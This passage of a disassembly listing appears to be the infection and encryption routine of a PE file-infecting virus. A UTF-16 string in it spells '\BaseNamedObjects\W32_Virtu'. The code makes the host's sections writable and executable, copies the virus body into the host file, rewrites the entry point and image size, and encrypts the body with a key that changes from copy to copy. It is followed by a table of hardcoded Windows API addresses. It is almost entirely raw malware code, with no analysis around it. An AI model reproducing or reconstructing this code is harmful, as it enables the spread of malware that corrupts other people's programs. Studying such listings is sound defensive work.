push ecx
call sub_3090A437
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3090B957: ; CODE XREF: sub_3090B8DE+92�j
push 20h
dec cl
pop eax
js short loc_3090B972
call sub_3090A437
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3090B957
; ---------------------------------------------------------------------------
loc_3090B972: ; CODE XREF: sub_3090B8DE+7E�j
; sub_3090B8DE+CD�j ...
push 6
pop ecx
loc_3090B978: ; CODE XREF: sub_3090B8DE+B8�j
push 6
pop eax
call sub_3090A437
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3090B978
test dword ptr [ebp+403431h], 8
jnz short loc_3090B9AD
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3090B972
loc_3090B9AD: ; CODE XREF: sub_3090B8DE+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3090B9D4
cmp byte ptr [ebp+403429h], 5
jz short loc_3090B972
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3090B972
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3090B972
loc_3090B9D4: ; CODE XREF: sub_3090B8DE+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3090B9E9
cmp byte ptr [ebp+403429h], 2
ja short loc_3090B972
loc_3090B9E9: ; CODE XREF: sub_3090B8DE+100�j
and dword ptr [ebp+4039AEh], 0
call loc_3090AE84
call sub_3090B7BA
call sub_3090BC24
mov ebx, [ebp+403976h]
call sub_3090B6E8
jz loc_3090BC1B
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3090B7FF
jb loc_3090BC1B
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3090BA51
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3090BA51: ; CODE XREF: sub_3090B8DE+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3090BA65
rep movsb
loc_3090BA65: ; CODE XREF: sub_3090B8DE+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3090BB1D
push dword ptr [ebx+28h]
call sub_3090ABEC
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3090BB1D
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3090BAA2
xor ecx, ecx
loc_3090BAA2: ; CODE XREF: sub_3090B8DE+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3090BB09
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3090BAE2
neg dword ptr [eax]
loc_3090BAE2: ; CODE XREF: sub_3090B8DE+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3090BB00
neg dword ptr [eax]
loc_3090BB00: ; CODE XREF: sub_3090B8DE+21E�j
push ecx
call sub_3090B7BA
pop ecx
jmp short loc_3090BB15
; ---------------------------------------------------------------------------
loc_3090BB09: ; CODE XREF: sub_3090B8DE+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3090BB15: ; CODE XREF: sub_3090B8DE+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3090BB1D: ; CODE XREF: sub_3090B8DE+191�j
; sub_3090B8DE+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3090BB36
imul edx, 12345678h
loc_3090BB36: ; CODE XREF: sub_3090B8DE+250�j
mov [eax-1], dl
call sub_30909B0A
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3090BB67
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3090BB67: ; CODE XREF: sub_3090B8DE+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3090BB8C
push edx
call sub_3090B4B2
pop edx
loc_3090BB8C: ; CODE XREF: sub_3090B8DE+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3090BB97
mov [ebx+28h], ecx
loc_3090BB97: ; CODE XREF: sub_3090B8DE+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3090BBA8
mov [edx+8], ecx
loc_3090BBA8: ; CODE XREF: sub_3090B8DE+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3090BBD9
add ecx, [ebp+40106Dh]
loc_3090BBD9: ; CODE XREF: sub_3090B8DE+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3090BBFB
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3090BBFB
mov dh, [ebp+403430h]
loc_3090BBFB: ; CODE XREF: sub_3090B8DE+307�j
; sub_3090B8DE+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3090BC12
loc_3090BC07: ; CODE XREF: sub_3090B8DE+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3090BC07
jmp short loc_3090BC1B
; ---------------------------------------------------------------------------
loc_3090BC12: ; CODE XREF: sub_3090B8DE+327�j
; sub_3090B8DE+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3090BC12
loc_3090BC1B: ; CODE XREF: UPX2:3090B8D9�j
; sub_3090B8DE+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3090B8DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090BC24 proc near ; CODE XREF: sub_3090B8DE+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3090B7B9
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3090BC3D: ; CODE XREF: sub_3090B6E8+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3090BC65: ; CODE XREF: sub_3090B6E8+6B�j
; sub_3090B6E8+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3090BC71: ; CODE XREF: sub_3090B6E8+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3090BC24 endp
; ---------------------------------------------------------------------------
dd 0E8h, 16A5D00h, 3349ED81h, 0F0580040h, 8085C10Fh, 85004015h
dd 0C883C3C0h, 0C10FF0FFh, 40158085h, 103DC300h, 75002A00h
dd 7C81661Ch, 716C0C24h, 0E8601375h, 0FFFFFFC4h, 7EE80575h
dd 0E8FFFFFBh, 0FFFFFFD2h, 2DFF2E61h, 12345678h, 25B8h
dd 0A5E86000h, 75FFFFFFh, 24448B39h, 4EB58D30h, 8B004038h
dd 81660850h, 7302063Ah, 685625h, 8B00FF00h, 52006AC4h
dd 0F895FF50h, 83004035h, 3E8108C4h, 5C3F3F5Ch, 0C6830375h
dd 0FB2BE804h, 7FE8FFFFh, 61FFFFFFh, 74B8C3h, 0B1EB0000h
dd 2FB8h, 10E800h, 20C20000h, 30B800h, 3E80000h, 0C2000000h
dd 548D0024h, 2ECD0C24h, 7C00F883h, 0E86019h, 8B000000h
dd 5D302454h, 0ED811A8Bh, 403413h, 0FFE539E8h, 4C261FFh
dd 3020100h, 1A050706h, 9594C770h, 0CC15FF6Ah, 90010010h
dd 40h dup(0)
dd 7C809B47h, 7C8308ADh, 7C910331h, 7C80ADA0h, 3 dup(0)
dd 7C80BDB6h, 7C801A24h, 7C80945Ch, 7C802367h, 7C81042Ch
dd 7C810637h, 7C864B0Fh, 7C80C058h, 7C80E7ECh, 7C81153Ch
dd 7C810A77h, 7C831C45h, 7C80B6A1h, 7C8608FFh, 7C835DCAh
dd 7C8111DAh, 7C812ADEh, 7C801D77h, 7C80B905h, 7C80BB76h
dd 7C8309E1h, 7C863DE5h, 7C863F58h, 7C812782h, 7C831CB8h
dd 7C802442h, 7C810B1Ch, 7C80B974h, 7C809A51h, 7C810D87h
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
dd 380036h, 3090BFA0h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 810000h, 0Ch dup(0)
dd 24560000h, 2B41h dup(0)
UPX2 ends
; Section 4. (virtual address 00017000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00017000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 30917000h
align 2000h
_idata2 ends
end start